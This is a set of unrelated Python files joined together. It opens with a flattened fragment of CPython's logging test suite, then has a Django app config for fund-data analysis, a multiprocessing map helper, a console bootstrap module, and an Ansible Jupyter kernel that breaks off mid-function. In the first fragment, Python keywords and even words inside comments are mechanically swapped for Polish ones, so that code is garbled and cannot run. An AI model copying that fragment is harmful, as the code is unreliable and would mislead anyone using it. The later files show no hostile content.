logging.handlers.RotatingFileHandler(self.fn) rh.emit(self.next_rec()) self.assertLogFile(self.fn) rh.close() def test_rollover_filenames(self): def namer(name): zwróć name + ".test" rh = logging.handlers.RotatingFileHandler( self.fn, backupCount=2, maxBytes=1) rh.namer = 
namer rh.emit(self.next_rec()) self.assertLogFile(self.fn) rh.emit(self.next_rec()) self.assertLogFile(namer(self.fn + ".1")) rh.emit(self.next_rec()) self.assertLogFile(namer(self.fn + ".2")) self.assertNieprawda(os.path.exists(namer(self.fn + ".3"))) rh.close() @support.requires_zlib def test_rotator(self): def namer(name): zwróć name + ".gz" def rotator(source, dest): przy open(source, "rb") jako sf: data = sf.read() compressed = zlib.compress(data, 9) przy open(dest, "wb") jako df: df.write(compressed) os.remove(source) rh = logging.handlers.RotatingFileHandler( self.fn, backupCount=2, maxBytes=1) rh.rotator = rotator rh.namer = namer m1 = self.next_rec() rh.emit(m1) self.assertLogFile(self.fn) m2 = self.next_rec() rh.emit(m2) fn = namer(self.fn + ".1") self.assertLogFile(fn) newline = os.linesep przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m1.msg + newline) rh.emit(self.next_rec()) fn = namer(self.fn + ".2") self.assertLogFile(fn) przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m1.msg + newline) rh.emit(self.next_rec()) fn = namer(self.fn + ".2") przy open(fn, "rb") jako f: compressed = f.read() data = zlib.decompress(compressed) self.assertEqual(data.decode("ascii"), m2.msg + newline) self.assertNieprawda(os.path.exists(namer(self.fn + ".3"))) rh.close() klasa TimedRotatingFileHandlerTest(BaseFileTest): # other test methods added below def test_rollover(self): fh = logging.handlers.TimedRotatingFileHandler(self.fn, 'S', backupCount=1) fmt = logging.Formatter('%(asctime)s %(message)s') fh.setFormatter(fmt) r1 = logging.makeLogRecord({'msg': 'testing - initial'}) fh.emit(r1) self.assertLogFile(self.fn) time.sleep(1.1) # a little over a second ... 
r2 = logging.makeLogRecord({'msg': 'testing - after delay'}) fh.emit(r2) fh.close() # At this point, we should have a recent rotated file which we # can test dla the existence of. However, w practice, on some # machines which run really slowly, we don't know how far back # w time to go to look dla the log file. So, we go back a fair # bit, oraz stop jako soon jako we see a rotated file. In theory this # could of course still fail, but the chances are lower. found = Nieprawda now = datetime.datetime.now() GO_BACK = 5 * 60 # seconds dla secs w range(GO_BACK): prev = now - datetime.timedelta(seconds=secs) fn = self.fn + prev.strftime(".%Y-%m-%d_%H-%M-%S") found = os.path.exists(fn) jeżeli found: self.rmfiles.append(fn) przerwij msg = 'No rotated files found, went back %d seconds' % GO_BACK jeżeli nie found: #print additional diagnostics dn, fn = os.path.split(self.fn) files = [f dla f w os.listdir(dn) jeżeli f.startswith(fn)] print('Test time: %s' % now.strftime("%Y-%m-%d %H-%M-%S"), file=sys.stderr) print('The only matching files are: %s' % files, file=sys.stderr) dla f w files: print('Contents of %s:' % f) path = os.path.join(dn, f) przy open(path, 'r') jako tf: print(tf.read()) self.assertPrawda(found, msg=msg) def test_invalid(self): assertRaises = self.assertRaises assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'X', delay=Prawda) assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'W', delay=Prawda) assertRaises(ValueError, logging.handlers.TimedRotatingFileHandler, self.fn, 'W7', delay=Prawda) def test_compute_rollover_daily_attime(self): currentTime = 0 atTime = datetime.time(12, 0, 0) rh = logging.handlers.TimedRotatingFileHandler( self.fn, when='MIDNIGHT', interval=1, backupCount=0, utc=Prawda, atTime=atTime) spróbuj: actual = rh.computeRollover(currentTime) self.assertEqual(actual, currentTime + 12 * 60 * 60) actual = rh.computeRollover(currentTime + 13 * 60 * 60) self.assertEqual(actual, currentTime + 
36 * 60 * 60) w_końcu: rh.close() #@unittest.skipIf(Prawda, 'Temporarily skipped dopóki failures investigated.') def test_compute_rollover_weekly_attime(self): currentTime = int(time.time()) today = currentTime - currentTime % 86400 atTime = datetime.time(12, 0, 0) wday = time.gmtime(today).tm_wday dla day w range(7): rh = logging.handlers.TimedRotatingFileHandler( self.fn, when='W%d' % day, interval=1, backupCount=0, utc=Prawda, atTime=atTime) spróbuj: jeżeli wday > day: # The rollover day has already dalejed this week, so we # go over into next week expected = (7 - wday + day) inaczej: expected = (day - wday) # At this point expected jest w days z now, convert to seconds expected *= 24 * 60 * 60 # Add w the rollover time expected += 12 * 60 * 60 # Add w adjustment dla today expected += today actual = rh.computeRollover(today) jeżeli actual != expected: print('failed w timezone: %d' % time.timezone) print('local vars: %s' % locals()) self.assertEqual(actual, expected) jeżeli day == wday: # goes into following week expected += 7 * 24 * 60 * 60 actual = rh.computeRollover(today + 13 * 60 * 60) jeżeli actual != expected: print('failed w timezone: %d' % time.timezone) print('local vars: %s' % locals()) self.assertEqual(actual, expected) w_końcu: rh.close() def secs(**kw): zwróć datetime.timedelta(**kw) // datetime.timedelta(seconds=1) dla when, exp w (('S', 1), ('M', 60), ('H', 60 * 60), ('D', 60 * 60 * 24), ('MIDNIGHT', 60 * 60 * 24), # current time (epoch start) jest a Thursday, W0 means Monday ('W0', secs(days=4, hours=24)), ): def test_compute_rollover(self, when=when, exp=exp): rh = logging.handlers.TimedRotatingFileHandler( self.fn, when=when, interval=1, backupCount=0, utc=Prawda) currentTime = 0.0 actual = rh.computeRollover(currentTime) jeżeli exp != actual: # Failures occur on some systems dla MIDNIGHT oraz W0. 
# Print detailed calculation dla MIDNIGHT so we can try to see # what's going on jeżeli when == 'MIDNIGHT': spróbuj: jeżeli rh.utc: t = time.gmtime(currentTime) inaczej: t = time.localtime(currentTime) currentHour = t[3] currentMinute = t[4] currentSecond = t[5] # r jest the number of seconds left between now oraz midnight r = logging.handlers._MIDNIGHT - ((currentHour * 60 + currentMinute) * 60 + currentSecond) result = currentTime + r print('t: %s (%s)' % (t, rh.utc), file=sys.stderr) print('currentHour: %s' % currentHour, file=sys.stderr) print('currentMinute: %s' % currentMinute, file=sys.stderr) print('currentSecond: %s' % currentSecond, file=sys.stderr) print('r: %s' % r, file=sys.stderr) print('result: %s' % result, file=sys.stderr) wyjąwszy Exception: print('exception w diagnostic code: %s' % sys.exc_info()[1], file=sys.stderr) self.assertEqual(exp, actual) rh.close() setattr(TimedRotatingFileHandlerTest, "test_compute_rollover_%s" % when, test_compute_rollover) @unittest.skipUnless(win32evtlog, 'win32evtlog/win32evtlogutil required dla this test.') klasa NTEventLogHandlerTest(BaseTest): def test_basic(self): logtype = 'Application' elh = win32evtlog.OpenEventLog(Nic, logtype) num_recs = win32evtlog.GetNumberOfEventLogRecords(elh) h = logging.handlers.NTEventLogHandler('test_logging') r = logging.makeLogRecord({'msg': 'Test Log Message'}) h.handle(r) h.close() # Now see jeżeli the event jest recorded self.assertLess(num_recs, win32evtlog.GetNumberOfEventLogRecords(elh)) flags = win32evtlog.EVENTLOG_BACKWARDS_READ | \ win32evtlog.EVENTLOG_SEQUENTIAL_READ found = Nieprawda GO_BACK = 100 events = win32evtlog.ReadEventLog(elh, flags, GO_BACK) dla e w events: jeżeli e.SourceName != 'test_logging': kontynuuj msg = win32evtlogutil.SafeFormatMessage(e, logtype) jeżeli msg != 'Test Log Message\r\n': kontynuuj found = Prawda przerwij msg = 'Record nie found w event log, went back %d records' % GO_BACK self.assertPrawda(found, msg=msg) # Set the locale to the 
platform-dependent default. I have no idea # why the test does this, but w any case we save the current locale # first oraz restore it at the end. @support.run_with_locale('LC_ALL', '') def test_main(): support.run_unittest( BuiltinLevelsTest, BasicFilterTest, CustomLevelsAndFiltersTest, HandlerTest, MemoryHandlerTest, ConfigFileTest, SocketHandlerTest, DatagramHandlerTest, MemoryTest, EncodingTest, WarningsTest, ConfigDictTest, ManagerTest, FormatterTest, BufferingFormatterTest, StreamHandlerTest, LogRecordFactoryTest, ChildLoggerTest, QueueHandlerTest, ShutdownTest, ModuleLevelMiscTest, BasicConfigTest, LoggerAdapterTest, LoggerTest, SMTPHandlerTest, FileHandlerTest, RotatingFileHandlerTest, LastResortTest, LogRecordTest, ExceptionTest, SysLogHandlerTest, HTTPHandlerTest, NTEventLogHandlerTest, TimedRotatingFileHandlerTest, UnixSocketHandlerTest, UnixDatagramHandlerTest, UnixSysLogHandlerTest) jeżeli __name__ == "__main__": test_main()
apps.py
import os
from datetime import timedelta, datetime
from threading import Thread

import akshare as ak
from django.apps import AppConfig
from timeloop import Timeloop

from analysis.conf.yconfig import YConfig
from analysis.core.service.fund import fetch_fund_data, init_data
from analysis.core.service.pattern import get_multiple_bb_data
from analysis.core.service.simulation_trade import SimulationTrade
from analysis.lib.utils import get_path

# Scheduled-job loop (timeloop); jobs fire on their interval once started.
t_loop = Timeloop()


@t_loop.job(interval=timedelta(hours=1))
def sample_job_every_1h():
    """Hourly job: refresh fund data and restart the simulated trades.

    Although polled every hour, the body only runs when the current hour
    satisfies ``12 < hour < 14`` — i.e. exactly once per day, during the
    13:00 hour.
    """
    now = datetime.now()
    if 12 < now.hour < 14:
        init_data()
        SimulationTrade.init()
        SimulationTrade.start_multiple_simulation_trade(YConfig.get('fund:code_list'))


class AnalysisConfig(AppConfig):
    """App config that bootstraps data directories, fund data and the
    background simulation-trade thread for the ``analysis`` app."""

    default_auto_field = 'django.db.models.BigAutoField'
    name = 'analysis'

    def ready(self):
        # Django calls ready() once the app registry is fully populated.
        # Startup work belongs here, not in the class body, where it would
        # execute at import time — possibly before Django has finished
        # initialising (see Django AppConfig.ready documentation).
        YConfig.get()
        fund_codes = YConfig.get('fund:code_list')
        SimulationTrade.init()

        # Create the raw-data / html resource directories on first run.
        if not os.path.exists(get_path('data/raw/')):
            os.makedirs(get_path('data/raw/'))
            os.makedirs(get_path('data/html/'))

        # Fetch the fund list (tiantian fund via akshare) once and cache it.
        fund_em_fund_name_df_path = get_path('data/raw/fund_em_fund_name_df.csv')
        if not os.path.exists(fund_em_fund_name_df_path):
            fetch_fund_data(fund_codes)

        # First run also needs the per-chart output directories
        # (makedirs creates missing parents).
        if not os.path.exists(get_path('data/image/')):
            os.makedirs(get_path('data/html/simulation_trade/'))
            os.makedirs(get_path('data/html/bollinger_bands/'))
            os.makedirs(get_path('data/image/simulation_trade/'))
            os.makedirs(get_path('data/image/bollinger_bands/'))

        # Generate Bollinger-band data, then run the simulated trading in a
        # background thread so server start-up is not blocked.
        get_multiple_bb_data(fund_codes)
        t = Thread(target=SimulationTrade.start_multiple_simulation_trade,
                   args=(fund_codes,))
        t.start()

        # Start the scheduled-job loop (left disabled, as in the original).
        # t_loop.start(block=True)
parallelize.py
import multiprocessing


def fun(f, q_in, q_out):
    """
    A helper function for the parmap function: a worker loop.

    Repeatedly takes ``(index, argument)`` pairs from ``q_in``, evaluates
    ``f(argument)`` and puts ``(index, result)`` on ``q_out``.  A pair whose
    index is ``None`` is the shutdown sentinel and terminates the loop.

    Parameters
    ----------
    f : function
        Function to be evaluated using arguments in the queue q_in.
    q_in : multiprocessing Queue object
        A queue for the input arguments.
    q_out : multiprocessing Queue object
        A queue for the output of the function evaluation.
    """
    while True:
        i, x = q_in.get()
        if i is None:
            break
        q_out.put((i, f(x)))


def parmap(f, X, proc_power=1):
    """
    A parallelized implementation of the map function.
    See https://www.w3schools.com/python/ref_func_map.asp .

    Parameters
    ----------
    f : function
        Function onto which to map the input arguments in X.  Must be
        picklable (e.g. a module-level function or builtin).
    X : array_like
        The arguments to be fed to the function f. This can only handle
        a single argument for each evaluation of f.
    proc_power : float, optional
        Fraction of the available CPU cores to use, in (0, 1].  Any other
        value uses all cores.  Default is 1 (all cores).

    Returns
    -------
    out : list
        A list of the outputs for each function evaluation corresponding
        to the input arguments in X, in the same order as X.
    """
    if 0 < proc_power <= 1:
        # max(1, ...): int() can truncate to zero for small fractions, which
        # would spawn no workers and deadlock on q_out.get() below.
        nprocs = max(1, int(proc_power * multiprocessing.cpu_count()))
    else:
        nprocs = multiprocessing.cpu_count()

    q_in = multiprocessing.Queue(1)
    q_out = multiprocessing.Queue()
    procs = [multiprocessing.Process(target=fun, args=(f, q_in, q_out))
             for _ in range(nprocs)]
    for p in procs:
        # Daemonize so stray workers cannot keep the parent process alive.
        p.daemon = True
        p.start()

    # Feed the work items, then one shutdown sentinel per worker.
    sent = [q_in.put((i, x)) for i, x in enumerate(X)]
    for _ in range(nprocs):
        q_in.put((None, None))

    # Collect exactly one result per submitted item, then reap the workers.
    res = [q_out.get() for _ in range(len(sent))]
    for p in procs:
        p.join()

    # Results arrive in completion order; restore input order by index.
    return [x for i, x in sorted(res)]
init.py
# -*- coding: utf-8 -*- # Written by: SantaSpeen # (c) SantaSpeen 2022 import os import sys from threading import Thread from .Console import Console from .Store import Store from . import tools c: Console = None s: Store = None def start_console(): global c, s c.builtins_hook() c.logger_hook() th = Thread(target=c.run) th.start() s.threads.update({"console": {"object": th, "pid": th.native_id}}) def init_core(): if os.name == 'nt': sys.stderr.write("\nWindows OS is not available\n\n") exit(1) global c, s c = Console(prompt_out="<:") s = Store().builtins_hook() s.builtins_hook() s.start_console = start_console s.terminal_size = tools.get_terminal_size s.clear = lambda: os.system('cls' if os.name == 'nt' else 'clear') return s
kernel.py
from __future__ import print_function from ipykernel.kernelbase import Kernel from ipykernel.comm import CommManager from ipykernel.zmqshell import ZMQInteractiveShell from IPython.core.display_trap import DisplayTrap from subprocess import check_output from traitlets import Instance, Type import pkg_resources import atexit import time import os import re import yaml import threading from subprocess import Popen, STDOUT, PIPE import logging import json import traceback import tempfile import six import pprint import shutil from pprint import pformat from six.moves import queue from collections import namedtuple, defaultdict import zmq from zmq.eventloop.zmqstream import ZMQStream from .modules import modules from .module_args import module_args from .task_args import task_args from .play_args import play_args from six.moves import configparser from zmq.eventloop.ioloop import IOLoop import ansible_runner StatusMessage = namedtuple('StatusMessage', ['message']) TaskCompletionMessage = namedtuple('TaskCompletionMessage', ['task_num']) TASK_ARGS_MODULES = modules + task_args __version__ = '0.9.0' logger = logging.getLogger('ansible_kernel.kernel') version_pat = re.compile(r'version (\d+(\.\d+)+)') DEBUG = False def ensure_directory(d): if not os.path.exists(d): os.mkdir(d) class _NullDisplay(object): def __init__(self): self.exec_result = None def __call__(self, result): logger.debug("NullDisplay %s", result) self.exec_result = result NullDisplay = _NullDisplay() NullDisplayTrap = DisplayTrap(hook=NullDisplay) class Splitter(object): def __init__(self, channels): self.channels = channels def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s', msg, args, kwargs) for channel in self.channels: result = channel.send_multipart(msg, *args, **kwargs) logger.debug('result %s', result) class AnsibleKernelHelpersThread(object): def __init__(self, queue): self.queue = queue self.io_loop = IOLoop(make_current=False) context = zmq.Context.instance() 
self.pause_socket = context.socket(zmq.REP) self.pause_socket_port = self.pause_socket.bind_to_random_port( "tcp://127.0.0.1") self.status_socket = context.socket(zmq.PULL) self.status_socket_port = self.status_socket.bind_to_random_port( "tcp://127.0.0.1") self.pause_stream = ZMQStream(self.pause_socket, self.io_loop) self.status_stream = ZMQStream(self.status_socket, self.io_loop) self.pause_stream.on_recv(self.recv_pause) self.status_stream.on_recv(self.recv_status) self.thread = threading.Thread(target=self._thread_main) self.thread.daemon = True def start(self): logger.info('thread.start') self.thread.start() atexit.register(self.stop) def stop(self): logger.info('thread.stop start') if not self.thread.is_alive(): return self.io_loop.add_callback(self.io_loop.stop) self.thread.join() logger.info('thread.stop end') def recv_status(self, msg): logger.info(msg) self.queue.put(StatusMessage(json.loads(msg[0]))) def recv_pause(self, msg): logger.info("completed %s waiting...", msg) self.queue.put(TaskCompletionMessage(json.loads(msg[0]))) def _thread_main(self): """The inner loop that's actually run in a thread""" self.io_loop.make_current() self.io_loop.start() self.io_loop.close(all_fds=True) class AnsibleKernel(Kernel): shell = Instance('IPython.core.interactiveshell.InteractiveShellABC', allow_none=True) shell_class = Type(ZMQInteractiveShell) implementation = 'ansible_kernel' implementation_version = __version__ @property def language_version(self): m = version_pat.search(self.banner) return m.group(1) _banner = None @property def banner(self): if self._banner is None: self._banner = check_output( ['ansible', '--version']).decode('utf-8') return self._banner language_info = {'name': 'ansible', 'codemirror_mode': 'yaml', 'mimetype': 'text/yaml', 'file_extension': '.yml'} help_links = [ { 'text': 'Ansible Reference', 'url': 'https://docs.ansible.com/ansible/latest/index.html' } ] def __init__(self, **kwargs): start_time = time.time() Kernel.__init__(self, 
**kwargs) logger.debug("session %s %s", type(self.session), self.session) logger.debug("iopub_socket %s %s", type(self.iopub_socket), self.iopub_socket) self.original_iopub_socket = self.iopub_socket self.iopub_socket = Splitter([self.original_iopub_socket, self]) self.user_ns = {} self.shell = self.shell_class.instance(parent=self, profile_dir=self.profile_dir, user_ns=self.user_ns, kernel=self) self.shell.displayhook.session = self.session self.shell.displayhook.pub_socket = self.iopub_socket self.shell.displayhook.topic = self._topic('execute_result') self.shell.display_pub.session = self.session self.shell.display_pub.pub_socket = self.iopub_socket self.comm_manager = CommManager(parent=self, kernel=self) self.shell.configurables.append(self.comm_manager) self.shell_handlers['comm_open'] = self.comm_open self.shell_handlers['comm_msg'] = self.comm_msg self.shell_handlers['comm_close'] = self.comm_close self.ansible_cfg = None self.ansible_process = None self.current_play = None self.next_task_file = None self.task_files = [] self.registered_variable = None self.playbook_file = None self.silent = False self.runner = None self.runner_thread = None self.shutdown_requested = False self.shutdown = False self.widgets = defaultdict(dict) self.widget_update_order = 0 self.vault_password = None self.default_inventory = "[all]\nlocalhost ansible_connection=local\n" self.default_play = yaml.dump(dict(hosts='localhost', name='default', gather_facts=False)) self.temp_dir = tempfile.mkdtemp(prefix="ansible_kernel_playbook") self.queue = None self.tasks_counter = 0 self.current_task = None logger.debug(self.temp_dir) ensure_directory(os.path.join(self.temp_dir, 'env')) ensure_directory(os.path.join(self.temp_dir, 'project')) self.copy_files() ensure_directory(os.path.join(self.temp_dir, 'project', 'roles')) with open(os.path.join(self.temp_dir, 'env', 'settings'), 'w') as f: f.write(json.dumps(dict(idle_timeout=0, job_timeout=0))) self.do_inventory(self.default_inventory) 
self.shell.run_code("import json") self.do_execute_play(self.default_play) logger.info("Kernel init finished took %s", time.time() - start_time) def copy_files(self): src = os.path.abspath('.') dest = os.path.join(self.temp_dir, 'project') src_files = os.listdir(src) for file_name in src_files: full_file_name = os.path.join(src, file_name) if (os.path.isfile(full_file_name)): shutil.copy(full_file_name, dest) if (os.path.isdir(full_file_name)): shutil.copytree(full_file_name, os.path.join(dest, file_name)) def start_helper(self): self.queue = queue.Queue() self.helper = AnsibleKernelHelpersThread(self.queue) self.helper.start() self.process_widgets() logger.info("Started helper") config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) if not config.has_section('defaults'): config.add_section('defaults') if config.has_option('defaults', 'roles_path'): roles_path = config.get('defaults', 'roles_path') roles_path = ":".join([os.path.abspath(x) for x in roles_path.split(":")]) roles_path = "{0}:{1}".format(roles_path, os.path.abspath(pkg_resources.resource_filename('ansible_kernel', 'roles'))) config.set('defaults', 'roles_path', roles_path) else: config.set('defaults', 'roles_path', os.path.abspath( pkg_resources.resource_filename('ansible_kernel', 'roles'))) logger.debug("vault_password? 
%s", self.vault_password and not config.has_option('defaults', 'vault_password_file')) if self.vault_password and not config.has_option('defaults', 'vault_password_file'): vault_password_file = os.path.join(self.temp_dir, 'project', 'vault-secret') with open(vault_password_file, 'w') as vpf: vpf.write(self.vault_password) config.set('defaults', 'vault_password_file', vault_password_file) if not config.has_section('callback_ansible_kernel_helper'): config.add_section('callback_ansible_kernel_helper') config.set('callback_ansible_kernel_helper', 'status_port', str(self.helper.status_socket_port)) with open(os.path.join(self.temp_dir, 'project', 'ansible.cfg'), 'w') as f: config.write(f) logger.info("Wrote ansible.cfg") def rewrite_ports(self): with open(self.playbook_file, 'r') as f: playbook = yaml.load(f.read(), Loader=yaml.FullLoader) playbook[0]['tasks'][0]['pause_for_kernel']['port'] = self.helper.pause_socket_port with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) def clean_up_task_files(self, backup=False): for task_file in self.task_files: if backup: shutil.copy(task_file, task_file + ".bak") if os.path.exists(task_file): os.unlink(task_file) self.task_files = [] def runner_process_message(self, data): logger.info("runner message:\n{}".format(pprint.pformat(data))) try: event_data = data.get('event_data', {}) task = event_data.get('task') role = event_data.get('role', None) event = data.get('event') if DEBUG: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) if event == 'playbook_on_start': pass elif event == 'playbook_on_play_start': pass elif event == 'playbook_on_stats': pass elif event == 'playbook_on_include': pass elif event == 'runner_on_start': pass elif event == 'playbook_on_task_start': logger.debug('playbook_on_task_start') task_args = event_data.get('task_args', []) task_uuid = data.get('uuid', '') 
self.queue.put(StatusMessage(['TaskStart', dict(task_name=task, role_name=role, task_arg=task_args, task_id=task_uuid)])) elif event == 'runner_on_ok': logger.debug('runner_on_ok') results = event_data.get('res', {}) device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, delegated_host_name=device_name, changed=results.get('changed', False), failed=False, unreachable=False, skipped=False, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_failed': device_name = event_data.get('host') task_uuid = data.get('uuid', '') results = event_data.get('res', {}) self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=True, unreachable=False, skipped=False, delegated_host_name=device_name, application_python=self._format_application_python(results), text_html=self._format_text_html(results), output=self._format_output(results), error=self._format_error(results), full_results=json.dumps(results).replace('\\', '\\\\'), results=self._dump_results(results), task_id=task_uuid)])) elif event == 'runner_on_unreachable': device_name = event_data.get('host') task_uuid = data.get('uuid', '') self.queue.put(StatusMessage(['TaskStatus', dict(task_name=task, role_name=role, device_name=device_name, changed=False, failed=False, unreachable=True, skipped=False, task_id=task_uuid)])) elif event == 'error': self.queue.put(StatusMessage(['Error', dict(stdout=data.get('stdout', ''))])) else: stream_content = dict(name='stdout', text="{}\n".format(pprint.pformat(data))) self.send_response(self.iopub_socket, 'stream', stream_content) except 
BaseException: logger.error(traceback.format_exc()) def process_message(self, message): logger.info("message %s", message) stop_processing = False message_type = message[0] message_data = message[1] logger.info("message_type %s", message_type) logger.info("message_data %s", message_data) if message_data.get('task_name', '') == 'pause_for_kernel': logger.debug('pause_for_kernel') return stop_processing if message_data.get('task_name', '') == 'include_variables': return stop_processing if message_data.get('task_name', '') == 'include_vars': return stop_processing if message_data.get('task_name', '') == 'include_tasks': logger.debug('include_tasks') if message_type == 'TaskStatus' and message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] if message_data.get('results', None): output += " => " output += message_data['results'] output += "\n" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return stop_processing output = '' if message_type == 'TaskStart': logger.debug('TaskStart') task_name = message_data['task_name'] if message_data.get('role_name'): task_name = "%s : %s" % (message_data['role_name'], task_name) output = 'TASK [%s] %s\n' % (task_name, '*' * (72 - len(task_name))) elif message_type == 'DeviceStatus': logger.debug('DeviceStatus') pass elif message_type == 'PlaybookEnded': logger.debug('PlaybookEnded') output = "\nPlaybook ended\nContext lost!\n" self.do_shutdown(False) self.clean_up_task_files(True) self.start_helper() self.rewrite_ports() self.start_ansible_playbook() stop_processing = True elif message_type == 'TaskStatus': logger.debug('TaskStatus') if message_data.get('changed', False): logger.debug('changed') output = 'changed: [%s]' % message_data['device_name'] elif message_data.get('unreachable', False): logger.debug('unreachable') output = 'fatal: [%s]: UNREACHABLE!' 
% message_data['device_name'] elif message_data.get('failed', False): logger.debug('failed') output = 'fatal: [%s]: FAILED!' % message_data['device_name'] else: logger.debug('ok') output = 'ok: [%s]' % message_data['device_name'] if message_data.get('full_results', None) and self.registered_variable is not None: logger.debug('full_results %s', type(message_data.get('full_results'))) line1 = "import json" line2 = "{0} = globals().get('{0}', dict())".format(self.registered_variable) line3 = "{0}['{2}'] = json.loads('{1}')".format(self.registered_variable, message_data.get('full_results'), message_data['device_name']) for line in [line1, line2, line3]: logger.debug(line) self.shell.run_cell(line) if message_data.get('results', None): output += " => " output += message_data['results'] if message_data.get('output', None): output += "\n\n[%s] stdout:\n" % message_data['device_name'] output += message_data['output'] if message_data.get('error', None): output += "\n\n[%s] stderr:\n" % message_data['device_name'] output += message_data['error'] if message_data.get('application_python', None): self.shell.run_cell(message_data.get('application_python')) if message_data.get('text_html', None): self.send_response(self.iopub_socket, 'display_data', dict(source="", data={"text/html": message_data.get('text_html')})) output += "\n" elif message_type == 'Error': logger.debug('Error') output = message_data.get('stdout') else: output = str(message) logger.info("output %s", output) if not self.silent: # Send standard output logger.info("sending output") stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) else: logger.info("silent") logger.info("stop_processing %s", stop_processing) return stop_processing def do_execute(self, code, silent, store_history=True, user_expressions=None, allow_stdin=False): self.silent = silent if not code.strip(): return {'status': 'ok', 'execution_count': self.execution_count, 'payload': 
[], 'user_expressions': {}} logger.debug('code %r', code) try: if code.strip().startswith("#inventory"): return self.do_inventory(code) elif code.strip().startswith("#ansible.cfg"): return self.do_ansible_cfg(code) elif code.strip().startswith("#host_vars"): return self.do_host_vars(code) elif code.strip().startswith("#group_vars"): return self.do_group_vars(code) elif code.strip().startswith("#vars"): return self.do_vars(code) elif code.strip().startswith("#template"): return self.do_template(code) elif code.strip().startswith("#task"): return self.do_execute_task(code) elif code.strip().startswith("#play"): return self.do_execute_play(code) elif code.strip().startswith("#python"): return self.do_execute_python(code) elif code.strip().startswith("#vault_password"): return self.do_execute_vault_password(code) else: return self.do_execute_task(code) except BaseException as e: logger.error(traceback.format_exc()) reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc().splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_traceback(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': traceback.format_exc(limit).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def send_error(self, e, limit=None): reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': str(e).splitlines(), 'ename': type(e).__name__, 'evalue': str(e)} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply def do_inventory(self, code): logger.info("inventory set to %s", code) with open(os.path.join(self.temp_dir, 
'inventory'), 'w') as f: f.write("\n".join(code.splitlines()[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_ansible_cfg(self, code): self.ansible_cfg = str(code) # Test that the code for ansible.cfg is parsable. Do not write the file yet. try: config = configparser.SafeConfigParser() if self.ansible_cfg is not None: config.readfp(six.StringIO(self.ansible_cfg)) except configparser.ParsingError as e: return self.send_error(e, 0) logger.info("ansible.cfg set to %s", code) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_host_vars(self, code): code_lines = code.strip().splitlines(True) host = code_lines[0][len('#host_vars'):].strip() logger.debug("host %s", host) host_vars = os.path.join(self.temp_dir, 'project', 'host_vars') if not os.path.exists(host_vars): os.mkdir(host_vars) with open(os.path.join(host_vars, host), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_vars(self, code): code_lines = code.strip().splitlines(True) vars = code_lines[0][len('#vars'):].strip() logger.debug("vars %s", vars) with open(os.path.join(self.temp_dir, 'project', vars), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_template(self, code): code_lines = code.strip().splitlines(True) template = code_lines[0][len('#template'):].strip() logger.debug("template %s", template) with open(os.path.join(self.temp_dir, 'project', template), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_group_vars(self, code): code_lines = code.strip().splitlines(True) group = code_lines[0][len('#group_vars'):].strip() logger.debug("group %s", group) group_vars = 
os.path.join(self.temp_dir, 'project', 'group_vars') if not os.path.exists(group_vars): os.mkdir(group_vars) with open(os.path.join(group_vars, group), 'w') as f: f.write("".join(code_lines[1:])) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_play(self, code): if self.is_ansible_alive(): self.do_shutdown(False) self.start_helper() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug('code_data %r', code_data) logger.debug('code_data type: %s', type(code_data)) self.current_play = code playbook = [] current_play = yaml.load(self.current_play, Loader=yaml.FullLoader) if current_play is None: current_play = {} playbook.append(current_play) tasks = current_play['tasks'] = current_play.get('tasks', []) current_play['roles'] = current_play.get('roles', []) for role in current_play['roles']: if "." in role: self.get_galaxy_role(role) current_play['roles'].insert(0, 'ansible_kernel_helpers') tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter - 1}}) widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') with open(widget_vars_file, 'w') as f: 